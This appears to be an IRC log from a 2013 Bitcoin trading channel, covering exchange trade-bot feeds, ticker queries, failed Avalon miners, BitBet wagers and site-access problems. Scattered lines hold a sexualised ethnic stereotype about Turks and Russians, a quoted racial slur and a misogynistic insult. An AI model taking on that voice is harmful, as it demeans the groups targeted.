01:11:33 Ukto: you don't accept bitcoins directly Mar 02 01:11:47 hopefully in the next 30 days Mar 02 01:12:10 new stuff will be in effect Mar 02 01:12:13 that will make your head spins Mar 02 01:12:16 and it wont matter Mar 02 01:12:23 spin Mar 02 01:14:22 mircea_popescu: mpex dossed again? Mar 02 01:19:48 http://bitbet.us/bet/277/bitbet-haxxed-in-2013/ Mar 02 01:19:50 wtff Mar 02 01:20:32 nvm Mar 02 01:24:32 [MPEX] [S.MPOE] 13000 @ 0.00075557 = 9.8224 BTC [+] Mar 02 01:26:14 lol Mar 02 01:27:41 [BTCTC] [GSDPT] 100 @ 0.006389 = 0.6389 BTC [+] Mar 02 01:29:06 now we wait for the weekend dip... Mar 02 01:29:26 [BTCTC] [S.MPOE-PT] 25 @ 0.00072 = 0.018 BTC [-] Mar 02 01:29:28 [BTCTC] [S.MPOE-PT] 925 @ 0.00073 = 0.6753 BTC [+] Mar 02 01:29:57 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Mar 02 01:30:11 https://bitcointalk.org/index.php?topic=148212.new;boardseen#new Mar 02 01:30:13 O: Mar 02 01:31:12 "Lessons learned. Batch #2 process will have improvements, minor design adjustments and other goodies." Mar 02 01:31:52 O_o Mar 02 01:31:59 damn son Mar 02 01:32:08 that is like $15,000 down the tubes Mar 02 01:32:11 theres more avalons than we discovered Mar 02 01:32:25 but why did both fuck up at the exact same time? Mar 02 01:33:42 he stacked them on top of each other Mar 02 01:33:49 or there is a faulty batch Mar 02 01:34:08 [HAVELOCK] [SDICE] 5 @ 0.6795 = 3.3975 BTC [-] Mar 02 01:34:19 hopefull batch two will resolve that Mar 02 01:34:30 [BTCTC] [GSDPT] 11 @ 0.006389 = 0.0703 BTC [+] Mar 02 01:38:40 FabianB is it ? Mar 02 01:39:31 bowjob that avalon bet adjustment seems prescient in retrospect huh Mar 02 01:40:10 [HAVELOCK] [SDICE] 35 @ 0.68 = 23.8 BTC [+] Mar 02 01:57:29 [MPEX] [O.BTCUSD.P310T] 1000 @ 0.11319853 = 113.1985 BTC [-] Mar 02 02:02:04 [MPEX] [S.MPOE] 5000 @ 0.00075999 = 3.8 BTC [+] Mar 02 02:02:10 [MPEX] [S.MPOE] 9700 @ 0.00076 = 7.372 BTC [+] Mar 02 02:07:56 "Sir, they are two avalon located in different rooms. No one touch them because they are all working well last night before I went to sleep." Mar 02 02:07:59 o this poor guy Mar 02 02:08:10 has the distinct sound of ruined family hopes and aspirations to it. Mar 02 02:24:36 if anyone desperately needs to place orders, mpex.coinbr.com still works Mar 02 02:24:45 at leat stat does Mar 02 02:25:03 im withholding my bet.. im uncertain' Mar 02 02:25:03 lol Mar 02 02:25:14 I already bet $1500 on avalon anyyway Mar 02 02:26:15 mircea_popescu , no comment? it's ddos? Mar 02 02:26:26 what is ?! Mar 02 02:26:34 site's fine ? Mar 02 02:26:45 i can't access mpex.co .. times out Mar 02 02:26:51 only via proxy Mar 02 02:27:00 tehn you may have a dns issue locally Mar 02 02:27:05 but the site is on the web. Mar 02 02:27:08 [HAVELOCK] [SDICE] 12 @ 0.685 = 8.22 BTC [+] Mar 02 02:27:20 http://www.downforeveryoneorjustme.com/mpex.co Mar 02 02:27:27 and it never was down today either. Mar 02 02:28:02 wtf is this Mar 02 02:28:17 interesting, are you going through the same hub as fabian ? Mar 02 02:29:14 [MPEX] [O.BTCUSD.P310T] 1000 @ 0.11319853 = 113.1985 BTC [-] Mar 02 02:29:14 i havent had any problems Mar 02 02:29:17 besides, it trades Mar 02 02:29:51 traaaceroute gets this: http://bitbin.it/Malhw4h3 Mar 02 02:29:54 also in the news, pinkhouse : http://polimedia.us/dtng/c/src/134290700472.jpg Mar 02 02:30:17 FabianB are you also going through the same node as jurov http://bitbin.it/Malhw4h3 ? Mar 02 02:30:34 does this pinkhouse have a street address? Mar 02 02:30:57 has* Mar 02 02:31:04 fuckin iliteral Mar 02 02:31:05 kakobrekla only for the initiated Mar 02 02:32:02 jurov it looks like atlas.cogentco is having issues and perhaps dropping packets Mar 02 02:33:03 good you have put the proxies in place, i just switched Mar 02 02:33:45 well hmm Mar 02 02:33:50 im initiated in various stuffs Mar 02 02:33:55 interesting that from my bitvps from zurich it works Mar 02 02:35:48 basically theres more avalons in the wild than we previously thought Mar 02 02:35:57 hm? Mar 02 02:35:59 so.. 298/300 avalons work Mar 02 02:36:40 https://bitcointalk.org/index.php?topic=148212.new;boardseen#new Mar 02 02:36:51 One thing that bothers me.. 2 of them shut off at the exact same time Mar 02 02:37:03 was it on his end? Mar 02 02:40:09 [HAVELOCK] [SDICE] 2 @ 0.685 = 1.37 BTC [+] Mar 02 02:58:59 ;;later tell Bugpowder Mar 02 02:58:59 (later tell ) -- Tells the next time is in seen. can contain wildcard characters, and the first matching nick will be given the note. Mar 02 02:59:03 ;;later tell Bugpowder http://gizmodo.com/5987639/scientists-wire-two-rats-brains-together-and-share-a-thought-across-the-internet Mar 02 02:59:04 The operation succeeded. Mar 02 02:59:22 ;;calc 298/300 Mar 02 02:59:23 0.993333333333 Mar 02 02:59:42 99% of all Avalon's work, seems like a good job. A+ no? Mar 02 03:03:57 ;;ticker Mar 02 03:03:58 BTCUSD ticker | Best bid: 34.27669, Best ask: 34.58835, Bid-ask spread: 0.31166, Last trade: 34.27626, 24 hour volume: 41270.19696629, 24 hour low: 32.92000, 24 hour high: 34.90000, 24 hour vwap: 34.26412 Mar 02 03:04:08 only 34.27? Mar 02 03:04:10 crash!!! Mar 02 03:04:27 ;;market sell 10000 Mar 02 03:04:29 A market order to sell 10000 bitcoins right now would net 333181.4110 USD and would take the last price down to 32.5000 USD, resulting in an average price of 33.3181 USD/BTC. Mar 02 03:04:33 ;;market sell 100000 Mar 02 03:04:35 A market order to sell 100000 bitcoins right now would net 2800852.7112 USD and would take the last price down to 19.5000 USD, resulting in an average price of 28.0085 USD/BTC. Mar 02 03:04:57 ;;market buy 100000 Mar 02 03:04:59 This order would exceed the size of the order book. You would buy 71717.994 bitcoins, for a total of 16174263427823.8477 USD and take the price to 13370133701337.0000. Mar 02 03:05:03 ;;market buy 1000 Mar 02 03:05:06 A market order to buy 1000 bitcoins right now would take 34837.9787 USD and would take the last price up to 34.9100 USD, resulting in an average price of 34.8380 USD/BTC. Mar 02 03:05:09 ;;market buy 10000 Mar 02 03:05:11 A market order to buy 10000 bitcoins right now would take 352432.4425 USD and would take the last price up to 35.9775 USD, resulting in an average price of 35.2432 USD/BTC. Mar 02 03:05:59 We very well may soon see how many bitcoins have actually been lost... Mar 02 03:06:21 ;;market sell 1000000 Mar 02 03:06:23 A market order to sell 1000000 bitcoins right now would net 4530174.0465 USD and would take the last price down to 0.0100 USD, resulting in an average price of 4.5302 USD/BTC. Mar 02 03:09:02 http://trilema.com/2013/all-thatll-do-is-drive-financiers-to-bitcoin/ Mar 02 03:09:28 jurov pretty nifty system after all huh. Mar 02 03:10:12 99% of all Avalon's work, seems like a good job. A+ no? << sauce? Mar 02 03:11:28 wut dat meen? Mar 02 03:11:47 where are all the other 98% ? Mar 02 03:13:02 in other news, coinbr unanimously voted to pay me bonuses Mar 02 03:13:13 few trillions satoshis Mar 02 03:13:24 untaxed Mar 02 03:14:13 thestringpuller oh you just made fun, i see Mar 02 03:15:01 i want to see 1 satoshi 1 cent Mar 02 03:15:02 :3 Mar 02 03:16:43 i will sell you a satoshi for 1 cent Mar 02 03:16:50 and you can have it. Mar 02 03:17:21 :/ Mar 02 03:17:29 what? Mar 02 03:17:36 isnt that what you said you wanted? Mar 02 03:17:44 yeah totally Mar 02 03:18:08 i can buy the satoshi for 1.5 cents Mar 02 03:18:24 and we'll push the tx to assbot thus making them official Mar 02 03:18:57 hehe Mar 02 03:19:12 does paypal even allow 1 cent txs Mar 02 03:19:29 what is paypal? Mar 02 03:20:25 paypal is this amazon scamcoin Mar 02 03:20:38 ebay scamcoin* Mar 02 03:20:49 ebay owns paypal :P Mar 02 03:20:58 mircea_popescu is going senile it seems. Mar 02 03:21:30 a distinction without a difference. Mar 02 03:21:48 [MPEX] [S.DICE] 100 @ 0.00637772 = 0.6378 BTC [+] Mar 02 03:21:50 [MPEX] [S.DICE] 300 @ 0.00637773 = 1.9133 BTC [+] Mar 02 03:21:58 [MPEX] [S.DICE] 1000 @ 0.00637775 = 6.3778 BTC [+] Mar 02 03:22:01 [MPEX] [S.DICE] 4900 @ 0.00637776 = 31.251 BTC [+] Mar 02 03:22:03 [MPEX] [S.DICE] 24700 @ 0.00637777 = 157.5309 BTC [+] Mar 02 03:22:18 nice Mar 02 03:22:21 you remember the story about detergent becoming..er..money? Mar 02 03:22:34 i think that was least scammy money ever Mar 02 03:22:49 and oh so liquid Mar 02 03:23:06 [MPEX] [S.DICE] 200 @ 0.00637777 = 1.2756 BTC [+] Mar 02 03:26:45 [MPEX] [S.MPOE] 14400 @ 0.00075557 = 10.8802 BTC [-] Mar 02 03:26:47 [MPEX] [S.MPOE] 9900 @ 0.00075142 = 7.4391 BTC [-] Mar 02 03:27:06 lol Mar 02 03:29:10 [MPEX] [O.BTCUSD.P330T] 750 @ 0.14253227 = 106.8992 BTC [-] Mar 02 03:30:09 [HAVELOCK] [SDICE] 15 @ 0.6675 = 10.0125 BTC [-] Mar 02 03:30:10 [HAVELOCK] [SDICE] 3 @ 0.667 = 2.001 BTC [-] Mar 02 03:30:12 [HAVELOCK] [SDICE] 38 @ 0.645 = 24.51 BTC [-] Mar 02 03:30:33 pity that beercoin didn't catch up Mar 02 03:30:48 you have like a million of those? Mar 02 03:31:30 lol Mar 02 03:31:48 i was given some Mar 02 03:32:15 http://bitbet.us/bet/277/bitbet-haxxed-in-2013/ Mar 02 03:32:17 1000:1! Mar 02 03:32:31 is not gonna happen pft Mar 02 03:33:45 kakobrekla is russian Mar 02 03:33:51 he's turkish Mar 02 03:33:58 lol Mar 02 03:34:01 azerbaijan Mar 02 03:34:16 a distinction without a difference << this Mar 02 03:34:43 named nationals would mightily disagree Mar 02 03:35:10 mircea said it not me Mar 02 03:35:15 lol Mar 02 03:35:26 there's plenty of diff between turks and russians. Mar 02 03:35:33 and thestringpusher is from burkina faso Mar 02 03:35:34 turks fuck their wives in the ass. russians beat them up. Mar 02 03:35:46 [BTCTC] [S.DICE-PT] 1 @ 0.00639 BTC [+] Mar 02 03:35:55 granted it's painful either way, but still. Mar 02 03:36:05 [BTCTC] [S.DICE-PT] 1 @ 0.00639 BTC [+] Mar 02 03:38:08 [BTCTC] [GSDPT] 2 @ 0.006388 = 0.0128 BTC [-] Mar 02 03:38:23 ;;calc 33 / (-0.25512908+1) Mar 02 03:38:23 44.3029780247 Mar 02 03:38:46 ;;calc 33 / (-0.13944319+1) Mar 02 03:38:46 38.3472649528 Mar 02 03:39:02 ;;calc 33 / (-0.17529893+1) Mar 02 03:39:02 40.0144988293 Mar 02 03:40:00 ;;calc 35 / (-0.22035473+1) Mar 02 03:40:00 44.8922110436 Mar 02 03:40:34 ;;calc 37 / (-0.18423278+1) Mar 02 03:40:34 45.3560759649 Mar 02 03:41:09 ;;calc 31 / (-0.27963952+1) Mar 02 03:41:09 43.0340098613 Mar 02 03:44:42 Stunt science. Mar 02 03:44:51 Stunt science? Mar 02 03:45:00 Nicolelis is a genius of stunts Mar 02 03:45:11 stunt as in the gangsta phrase? Like Mar 02 03:45:12 I was tempted Mar 02 03:45:19 "nigga you be stuntin" Mar 02 03:45:21 To propose that expt Mar 02 03:45:35 He is tight with Lula Mar 02 03:45:47 Here is the criticism Mar 02 03:46:02 We learn nothing from that experiment Mar 02 03:46:13 It's just a cool demo Mar 02 03:46:40 But it is a pretty cool demo Mar 02 03:47:33 I proposed that expt to a postdoc in his lab and he was like... Yah I'm not supposed to say anything but we already have done that Mar 02 03:47:45 6. Months ago Mar 02 03:48:32 Nicolelis has a great sense for sexy science Mar 02 03:48:51 Dr. Bugpowder Mar 02 03:49:13 For b Mar 02 03:49:22 For now... Mar 02 03:49:29 Soon to be prof Mar 02 03:49:47 [BTCTC] [GSDPT] 98 @ 0.006388 = 0.626 BTC [-] Mar 02 03:49:49 Professor Bugpowder, you should take bribes from your students in BTC. Mar 02 03:49:50 [BTCTC] [GSDPT] 1120 @ 0.006389 = 7.1557 BTC [+] Mar 02 03:49:52 [BTCTC] [GSDPT] 100 @ 0.00639 = 0.639 BTC [+] Mar 02 03:49:53 or S.DICE stock Mar 02 03:49:53 [BTCTC] [GSDPT] 4731 @ 0.00639 = 30.2311 BTC [+] Mar 02 03:49:55 [BTCTC] [GSDPT] 2241 @ 0.0064 = 14.3424 BTC [+] Mar 02 03:49:57 [BTCTC] [GSDPT] 6659 @ 0.00641 = 42.6842 BTC [+] Mar 02 03:51:46 [MPEX] [O.BTCUSD.P390T] 750 @ 0.23606086 = 177.0456 BTC [-] Mar 02 03:52:27 puts capitulation ? Mar 02 03:52:32 I would never Mar 02 03:53:51 hahaha so basically avalon 1st april delivery bet is about to overtake bfl 1st april delivery. Mar 02 03:54:08 talk about collapse into irrelevance. Mar 02 03:54:15 lol Mar 02 03:54:22 dont i get anything for that bet Mar 02 03:54:23 ? Mar 02 03:54:34 you put it in ? Mar 02 03:54:38 yeah Mar 02 03:54:45 i didnt take a side however Mar 02 03:54:49 then yes, when it settles. your addy should be on one of the inputs Mar 02 03:54:54 you automatically get the lower house bet. Mar 02 03:54:56 go check Mar 02 03:55:06 http://bitbet.us/bet/274/bernard-hopkins-vs-tavoris-cloud-hopkins-to-win/ Mar 02 03:55:11 like 100 btc ? who's hopkins even Mar 02 03:56:06 Bernard?? Mar 02 03:56:43 Is he retired Mar 02 03:56:59 seems not Mar 02 03:57:39 Like 5 years ago Mar 02 04:05:47 ;;ticker Mar 02 04:05:47 BTCUSD ticker | Best bid: 34.02125, Best ask: 34.02600, Bid-ask spread: 0.00475, Last trade: 34.02124, 24 hour volume: 43518.84638286, 24 hour low: 32.92000, 24 hour high: 34.90000, 24 hour vwap: 34.27453 Mar 02 04:05:58 $34.02.. crash! Mar 02 04:06:05 here comes some coins! Mar 02 04:06:48 mhm, its weekend Mar 02 04:06:57 oh yeah, weekend dip. nothing to worry about Mar 02 04:13:25 i wanna sell my avalon batch 2 as a collectors item someday Mar 02 04:13:46 Fucking 10000 BTC wall Mar 02 04:13:59 might fetch quite a price at sotheby's Mar 02 04:14:02 Hory weekend dump Mar 02 04:14:31 Logging into mtgox Mar 02 04:14:55 ;;ticker Mar 02 04:14:56 BTCUSD ticker | Best bid: 33.37000, Best ask: 33.40000, Bid-ask spread: 0.03000, Last trade: 33.40000, 24 hour volume: 46971.71104167, 24 hour low: 32.92000, 24 hour high: 34.90000, 24 hour vwap: 34.23265 Mar 02 04:15:04 the bears are attacking Mar 02 04:15:18 brb, dumping. see you at single digits Mar 02 04:15:41 Massive ask wall at 33.50 Mar 02 04:16:05 u scared much? Mar 02 04:16:18 infidels Mar 02 04:16:32 Nah Mar 02 04:16:35 Just need to Mar 02 04:16:41 Position my buy orders Mar 02 04:16:58 bots need to get repositioned Mar 02 04:17:40 "161 arrested in Saudi Arabia protest over detentions, including 15 women and 6 children" Mar 02 04:17:47 so basically... they have more reason to protest now Mar 02 04:18:05 saudi people are very good at beheading Mar 02 04:18:09 way better than the mexicans Mar 02 04:19:24 ya well... they failed to protect irak, Mar 02 04:19:28 then fgailed to protect lybia Mar 02 04:19:32 syria is pretty much lost Mar 02 04:19:35 so now it's their turn. Mar 02 04:19:51 the old jewish story about "when they finally came for me there was no one else around" Mar 02 04:20:48 ;;bc,stat Mar 02 04:20:48 Error: "bc,stat" is not a valid command. Mar 02 04:20:52 ;;bc,stats Mar 02 04:20:55 Current Blocks: 223830 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 1961 blocks | Next Difficulty In About: 1 week, 5 days, 17 hours, 36 minutes, and 37 seconds | Next Difficulty Estimate: 4843098.93958 | Estimated Percent Change: 10.87995 Mar 02 04:23:19 the economist cover on Syria was cool Mar 02 04:25:36 it ain't gonna happen. Mar 02 04:39:04 ;;ticker Mar 02 04:39:05 BTCUSD ticker | Best bid: 33.71000, Best ask: 33.89879, Bid-ask spread: 0.18879, Last trade: 33.89879, 24 hour volume: 60515.34646797, 24 hour low: 32.92000, 24 hour high: 34.90000, 24 hour vwap: 34.09078 Mar 02 04:39:18 dat spread Mar 02 04:39:28 wow Mar 02 04:40:01 someone's back'in up the truck Mar 02 04:41:49 well, that dump was absorbed easily Mar 02 04:41:59 this perma-rally is crazy Mar 02 04:43:23 shorts have been getting crushed Mar 02 04:44:42 http://i.imgur.com/KzY4tPF.jpg Mar 02 04:44:44 not too shabby Mar 02 04:46:42 dang kakobrekla Mar 02 04:47:24 not mine, but i wouldnt mind. Mar 02 04:47:53 srsly Mar 02 04:48:02 ;;ticker Mar 02 04:48:03 BTCUSD ticker | Best bid: 34.02502, Best ask: 34.13582, Bid-ask spread: 0.11080, Last trade: 34.13583, 24 hour volume: 62126.92918597, 24 hour low: 32.92000, 24 hour high: 34.90000, 24 hour vwap: 34.08840 Mar 02 04:48:10 ;;calc 1500/34 Mar 02 04:48:11 44.1176470588 Mar 02 04:48:16 44 btc Mar 02 04:48:34 each Mar 02 04:49:07 wow. Mar 02 04:49:25 cheap Mar 02 04:49:42 you need to find 2 blocks and you are even Mar 02 04:51:29 gtfo you don't have any of those lol Mar 02 04:52:24 if I push you 44BTC you'll send? Mar 02 04:52:35 03:47.20 ( kakobrekla ) not mine, but i wouldnt mind. Mar 02 04:52:42 yah. aight hahaha Mar 02 04:52:50 im like dude, i want one!!! Mar 02 04:53:26 you probably would have scammed me for 2 Mar 02 04:53:30 ass Mar 02 04:53:41 *ahem* Mar 02 04:53:51 not you FabianB_, scammar kakobrekla Mar 02 04:53:59 :P Mar 02 04:54:26 tryin to pull the ole "i got asic's!!!" one on mod6 Mar 02 04:54:34 nah Mar 02 04:54:37 hahaa Mar 02 04:54:39 but i wouldnt sell em Mar 02 04:54:43 even if i had em Mar 02 04:54:55 im sayin! Mar 02 04:55:13 bbl Mar 02 04:55:26 ok. Mar 02 04:55:58 Wall got bot?! Mar 02 04:56:24 well, then I saw another like 10000 show up on the ask side. Mar 02 04:56:45 but yeah, the first 10000 did! Mar 02 04:56:48 it was fast Mar 02 04:58:10 lets see what gribble says Mar 02 04:58:30 dub http://trilema.com/2013/dazed-and-confused/ Mar 02 04:58:40 ;;asks 33 Mar 02 04:58:42 There are currently 0 bitcoins offered at or under 33.0 USD, worth 0.0 USD in total. Mar 02 04:58:58 ;;asks 35 Mar 02 04:59:00 There are currently 5933.3105 bitcoins offered at or under 35.0 USD, worth 206963.560478 USD in total. Mar 02 04:59:06 oh hmm. Mar 02 04:59:40 ;;ticker Mar 02 04:59:42 BTCUSD ticker | Best bid: 33.69391, Best ask: 33.84351, Bid-ask spread: 0.14960, Last trade: 33.84351, 24 hour volume: 62235.33867428, 24 hour low: 32.92000, 24 hour high: 34.90000, 24 hour vwap: 34.08873 Mar 02 04:59:55 the calls are gonna make bank. Mar 02 05:00:11 yeah, i think my clark moody was screwed up Mar 02 05:03:21 i wish kako had those asics Mar 02 05:03:58 one of those guys from the other night was like, "LETS GET TWO!!" heh Mar 02 05:10:37 they're something of a unicorn methinks Mar 02 05:17:20 ;; ticker Mar 02 05:17:20 BTCUSD ticker | Best bid: 33.66001, Best ask: 33.89669, Bid-ask spread: 0.23668, Last trade: 33.65062, 24 hour volume: 62649.19977577, 24 hour low: 32.92000, 24 hour high: 34.90000, 24 hour vwap: 34.08709 Mar 02 05:18:04 http://bitbet.us/bet/254/btc-usd-at-mtgox-will-be-above-35-on/ Resolved? Mar 02 05:18:58 it says there Mar 02 05:18:59 Betting closed. Pending resolution. Mar 02 05:19:16 Is it UTC? Mar 02 05:19:40 yea Mar 02 05:20:09 Cool Mar 02 05:38:07 did it ? Mar 02 05:38:11 ;;ticker Mar 02 05:38:12 BTCUSD ticker | Best bid: 34.41001, Best ask: 34.42509, Bid-ask spread: 0.01508, Last trade: 34.40738, 24 hour volume: 62436.63064572, 24 hour low: 32.92000, 24 hour high: 34.90000, 24 hour vwap: 34.09427 Mar 02 05:38:24 seems not. Mar 02 05:38:58 "stabilization of expected inflation..are products of the increasing credibility of the Fed's commitment to price stability" Mar 02 05:39:00 ahahaha duuude. Mar 02 05:39:07 i wonder what's in their tokes. Mar 02 05:47:06 [BTCTC] [BITVPS] 1 @ 0.00412 BTC [-] Mar 02 06:08:19 [BTCTC] [S.BBET-PT] 10 @ 0.00198 = 0.0198 BTC [-] Mar 02 06:11:52 [MPEX] [S.MPOE] 10690 @ 0.00075142 = 8.0327 BTC [-] Mar 02 06:11:59 [MPEX] [S.MPOE] 1860 @ 0.00074926 = 1.3936 BTC [-] Mar 02 06:20:35 burnside exchanges down? Mar 02 06:24:23 seems fine Mar 02 06:30:34 I get Error: Xcoind backend failure in getbalance at 774 Mar 02 06:32:23 are you logged in as mircea_popescu ? Mar 02 06:33:19 nah i sold those 900 shares Mar 02 06:34:45 works fine in a diff browser Mar 02 06:35:26 http://mises.org/daily/6361/Monetary-Origins-of-the-Poker-Bubble Mar 02 06:35:30 actually a pretty good read. Mar 02 06:36:16 ok so i opened another browser, Mar 02 06:36:20 but when i log in Mar 02 06:36:26 it gives me the error again Mar 02 06:36:38 when you tested did you log in? Mar 02 06:36:47 i assume you dont have an account... Mar 02 06:36:51 [MPEX] [O.BTCUSD.C330T] 8 @ 0.26455015 = 2.1164 BTC [+] Mar 02 06:37:11 [HAVELOCK] [SDICE] 3 @ 0.681 = 2.043 BTC [+] Mar 02 06:39:25 i just pinged Mar 02 06:39:55 burnside_afk ^ Mar 02 06:40:08 https://bitcointalk.org/index.php?topic=147504.msg1572916#msg1572916 seen this lol Mar 02 06:41:17 such an expesive lesson to learn! Mar 02 06:41:28 well, they lost just a bit Mar 02 06:41:37 bet right, still lose money however is fucking lol Mar 02 06:41:53 it's certainly not good for publicity, Mar 02 06:42:17 but i also kinda fon't care about people trying to sneak bets in at low risk Mar 02 06:42:22 well people should not make a bet when weight is only 75 out of 100,000 Mar 02 06:42:23 don't* Mar 02 06:42:57 yeah i made like 9% on my late bet Mar 02 06:43:06 people need to do mathz Mar 02 06:43:13 also, as mp pointed out, if it was a higher ratio bet Mar 02 06:43:19 lower weight can still get coin Mar 02 06:43:52 but i also kinda fon't care about people trying to sneak bets in at low risk << this. Mar 02 06:44:06 scalper self-owned. duh. Mar 02 06:44:55 that guy who bet 50 BTC Mar 02 06:45:00 lost like 11 cents Mar 02 06:45:04 cry me a river Mar 02 06:54:47 i just found it funny Mar 02 06:54:55 i was not complaining Mar 02 06:56:05 i guess bitbet is busting into the mainstream, Mar 02 06:56:12 there's fiddy threads about that it seems Mar 02 07:00:04 yeah, people who like btc love gambling Mar 02 07:00:14 crazy... Mar 02 07:00:59 i think people love gambling a liot more than anyone suspects Mar 02 07:01:03 it's just too difficult to do Mar 02 07:01:34 i had someone justify scratch tickets to me the other day Mar 02 07:01:44 basically, you can't win if you don't play! Mar 02 07:03:00 I liked scalping BoB bets. Lately they've stopped me tho. Mar 02 07:06:05 how ? Mar 02 07:08:18 dang them DMC shares paid nicely Mar 02 07:09:31 https://bitcointalk.org/index.php?topic=147314.msg1568293#msg1568293 Mar 02 07:09:36 i like it when she totally shots threads dead Mar 02 07:11:50 i think one appealing aspect of the company retaining shares as payment Mar 02 07:12:06 is it make figuring dividends per share simpler Mar 02 07:12:43 how you figure ? Mar 02 07:14:14 on the fly i mean, like while checking out stock prices on the exchanges Mar 02 07:14:42 you dont need to memorize or look up how many shares are public Mar 02 07:15:24 like sdice, how 10% of profit goes to public Mar 02 07:15:38 uh Mar 02 07:15:46 what you say seems to contradict what you say. Mar 02 07:15:54 i realize that Mar 02 07:15:55 lol Mar 02 07:16:20 so, normal company. issues 100 shares, makes 100 profit, retains 30% pays out 70%. dividend is .7 per share Mar 02 07:16:48 weirdo glbse abomination : issues 100 shares, of which it sells 70 and keeps 30 "for growth". makes 100 profit now it pays out 1 per share Mar 02 07:17:00 except each actual share gets a further .3 from the retainment Mar 02 07:17:02 and wtf Mar 02 07:17:56 pretty much yeah Mar 02 07:19:28 and then later maybe it sells some of the "kept" shares Mar 02 07:19:49 in general it's just a way to equivocate ownership, which practically works as a way for the operator to steal equity. Mar 02 07:19:58 not something you wish to see. Mar 02 07:20:41 expenses arent exactly difficult to fake either Mar 02 07:23:17 true Mar 02 07:23:24 this is a major problem going forward actually. Mar 02 07:24:29 for example, this bitcoinpride ipo Mar 02 07:24:39 who knows what the hell his expenses are Mar 02 07:24:43 selling shirts Mar 02 07:24:49 is he printing on demand? Mar 02 07:24:55 screenprinting in batches? Mar 02 07:25:04 using a vendor? Mar 02 07:25:58 yeah Mar 02 07:29:19 mp, i was told if we deposit 1000 btc on mpex we get a free account. true or not? Mar 02 07:31:01 not. **** BEGIN LOGGING AT Sat Mar 2 14:57:41 2013 Mar 02 15:01:22 Hi there, I would like to start correspondence with you, i have seen your profile and i'm very interested. I'm looking for loyal, romantic and intelligent guy for serious relations. Mar 02 15:01:32 ok, who's been spreading shit about me ? Mar 02 15:01:57 that's cheating spamming whore Mar 02 15:02:04 -'s Mar 02 15:02:40 I dunno dood. she signs "Respectfully yours, Tanya" and her email is Sorokian83@yandex.ru Mar 02 15:02:42 seems legit. Mar 02 15:02:58 don't let her go bro, follow your heart Mar 02 15:18:59 "[WTB] $ Get Me a Digital File(s) From the Internet $ johnniewalker" Mar 02 15:19:02 is this guy serious ?! Mar 02 15:36:21 mornin. Mar 02 15:37:19 dude bitbet was haxed! Mar 02 15:39:03 ? Mar 02 15:39:41 not again Mar 02 15:40:12 lol Mar 02 15:41:42 https://bitcointalk.org/index.php?topic=148350.0 Mar 02 15:41:58 gotta love this stuff. asicminer/bitfountain dropped the ball on handling their shares ? Mar 02 15:42:04 that's ok, the market will do what it can. Mar 02 15:42:17 perhaps the next company learns to be less retarded from this. Mar 02 15:43:12 hmmmm Mar 02 15:43:23 asicminer PT Mar 02 15:51:18 [MPEX] [S.MPOE] 10100 @ 0.00074766 = 7.5514 BTC [+] Mar 02 15:51:20 [MPEX] [S.MPOE] 600 @ 0.0007476 = 0.4486 BTC [-] Mar 02 15:53:27 !ticker m s.dice Mar 02 15:53:30 [MPEX:S.DICE] 1D: 0.00610823 / 0.00637054 / 0.00637777 (37300 shares, 237.62 BTC), 7D: 0.00578039 / 0.00624256 / 0.00638999 (351758 shares, 2,195.87 BTC), 30D: 0.0042 / 0.00601894 / 0.007395 (6807830 shares, 40,975.93 BTC) Mar 02 15:53:41 ;;calc 0.00601894*40000 Mar 02 15:53:42 240.7576 Mar 02 15:55:56 ;;estimate Mar 02 15:55:58 Next difficulty estimate | 4194032.01349 based on data since last change | 4324654.12955 based on data for last three days Mar 02 16:02:40 [BTCTC] [LTC-MINING] 1 @ 0.398 BTC [+] Mar 02 16:02:45 [BTCTC] [PAJKA.BOND] 2 @ 0.1 = 0.2 BTC [+] Mar 02 16:02:50 [BTCTC] [SYNERGY] 2 @ 0.1199 = 0.2398 BTC [+] Mar 02 16:03:48 [BTCTC] [B.YABMC] 18 @ 0.00849 = 0.1528 BTC [-] Mar 02 16:09:49 [BTCTC] [BASIC-MINING] 7 @ 0.35 = 2.45 BTC [+] Mar 02 16:12:30 [BTCTC] [B.YABMC] 8 @ 0.00849 = 0.0679 BTC [-] Mar 02 16:15:57 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.20845732 = 208.4573 BTC [+] Mar 02 16:15:59 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.23388811 = 233.8881 BTC [+] Mar 02 16:16:00 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.26266949 = 262.6695 BTC [-] Mar 02 16:16:04 [MPEX] [O.BTCUSD.C310T] 8 @ 0.27533866 = 2.2027 BTC [-] Mar 02 16:16:11 [MPEX] [O.BTCUSD.C310T] 992 @ 0.29501916 = 292.659 BTC [+] Mar 02 16:17:14 aaand the oix jumps two dolla Mar 02 16:18:17 36 O_o Mar 02 16:18:28 almost 37 Mar 02 16:18:47 yeh Mar 02 16:18:57 these are exciting times Mar 02 16:20:31 Chaang-Noi what you're probably thinking about is the fact that if you trade worth somethign like a few k's worth you make your mpex reg fee back out of the fees difference. Mar 02 16:21:11 also i nthe news, http://www.usatoday.com/story/news/nation/2013/02/28/girls-gone-wild-bankruptcy/1954419/ Mar 02 16:23:34 oh no Mar 02 16:23:53 who will document these beautiful creatures? Mar 02 16:24:04 their bfs ? Mar 02 16:36:54 mp it was something your pr girl told theymos Mar 02 16:37:48 a, a that. Mar 02 16:38:00 yeah, but that was strictly an offer related to his forum moneyz. Mar 02 16:38:07 like a one off sort of thing. (he missed out on it too) Mar 02 16:38:20 that did not seem to be clear Mar 02 16:38:43 a well. we live, we clarify. Mar 02 16:39:07 just wondering, i passed up the free account with no string attached anyway. Mar 02 16:39:42 i kinda found why he was doing that with the forum moneies, he wanted to do fraction reserves... Mar 02 16:39:46 seems like a cover to spend it.. Mar 02 16:39:51 [BTCTC] [BTC-TRADING-PT] 2 @ 0.0906 = 0.1812 BTC [+] Mar 02 16:40:04 from what i recall you got really hot and bothered because you missent something like a 1 btc Mar 02 16:40:15 back before mpex, in the mpoe days Mar 02 16:40:32 ? Mar 02 16:40:42 mpoe? Mar 02 16:42:06 i passed it up cuz i assumed an exchange with high fees would never work, and other than s,dice that seems to be true, and i think s.dice is way to high and i would not ahve invested in it anyway. Mar 02 16:42:44 my lawyer advised me to not use mpex Mar 02 16:43:05 BitHub did you get a signed paper and everything ? Mar 02 16:43:08 lol, why did you waste your lawyers time? what did you really think he would say? Mar 02 16:43:36 what lawyer anywhere would think an unregistered stock exchange in fake internet money was a good idea?? Mar 02 16:44:11 i'm 